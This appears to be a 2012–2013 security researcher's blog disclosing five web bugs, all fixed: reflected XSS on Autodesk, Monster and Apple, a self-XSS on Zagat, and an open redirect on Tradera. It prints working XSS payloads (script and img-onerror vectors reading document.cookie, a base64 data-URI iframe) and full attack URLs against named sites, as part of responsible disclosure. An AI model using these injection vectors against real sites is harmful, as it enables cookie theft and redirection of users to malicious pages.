Monday, 14 January 2013

[ Resolved XSS on Autodesk.com ]


This is a reported "Reflected XSS" found on autodesk.com which i've reported it responsibly on 30/06/2012 and they have fixed it silently without replying.

Severity: Reflected XSS
Confidence: Certain
Host: http://usa.autodesk.com/
Path:  /adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=

Issue detail:
What i did was to enter the below XSS vector in the search field.
</script><script>alert(document.cookie)</script>

The final url is like below:
http://usa.autodesk.com/adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=</script><script>alert(document.cookie)</script>&x=0&y=0

This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: June 30, 2012
Resolution: Vendor silently fixed it
Posted by at No comments:
Labels: ,

[ Resolved Open Redirect on tradera.com ]


This is a reported "Open Redirect" bug found on tradera.com which i've reported it responsibly on 20/06/2012 and eBay have fixed it.

Severity: URL Redirection
Confidence: Certain
Host: http://zandra.tradera.com/
Path: /event/uoqru/tradera.content.ros/2381283037/click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880

Issue detail:
The link was found on the main page of tradera.com
If i were to replace "click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880" with "http://www.ebay.de" without the quotes

If attackers were to send this link to innocent victims, they might be redirected to another malicious website instead of ebay.de as shown in the exmple above.


Reported by: Jacob Soo
Vendor Notification: June 20, 2012
Resolution: October 27, 2012
Posted by at No comments:
Labels:

[ Resolved Self-XSS on Zagat.com ]


This is a reported "Self XSS" on zagat.com which i've reported it responsibly on 19/05/2012 and Google have fixed it within days.

Severity: Self-XSS
Confidence: Certain
Host:   http://www.zagat.com
Path:   GET /search/location

Issue detail:
The XSS vector in my examples is
"><img src=x onerror=prompt(1);>
I submitted it in between the value of "location field". In this case i took "annandale, va" for my example.
This input was echoed as
annan"><img src=x onerror=prompt(1);>+dale%2C+va
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated how do i make use of a dynamically evaluated expression which allows me to introduce arbitrary JavaScript into the document.

Note that this technique is works on all the browsers i have installed currently.

This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: May 19, 2012
Resolution: May 24, 2012
Posted by at No comments:
Labels: ,

[ Resolved XSS on Monster.com ]



This is a reported "Reflected XSS" on monster.com which i've reported it responsibly on 28/06/2012 and monster.com have silently fixed it without replying back to me. Life is such.

Severity: Reflected XSS
Confidence: Certain
Host: http://jobsearch.monster.com/
Path: /search/

Issue detail:
What i did was to enter the below XSS vector in the search fields.
"><img src=x onerror=prompt(document.cookie);>

You will have something like the following:
http://jobsearch.monster.com/search/__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E_5?q=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E&where=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E

This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: June 28, 2012
Resolution: July 2012

Posted by at No comments:
Labels: ,

[ Resolved XSS on Apple.com ]



This is a reported "Reflected XSS" on apple.com which i've reported it responsibly on 04/08/2012
I'll be blogging about some web bugs which i've reported and had been fixed. :D


Severity: Reflected XSS
Confidence: Certain
Host: http://www.apple.com/recycling/ipod-cell-phone/
Path: /

Issue detail:
What i did was to popup a alert using the payload below, which is just a base64 encoded of alert(document.cookie)
"<iframe src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk+"></iframe>



This is the screenshot before i send my payload.



This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: August 04, 2012
Resolution: September 26, 2012



Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)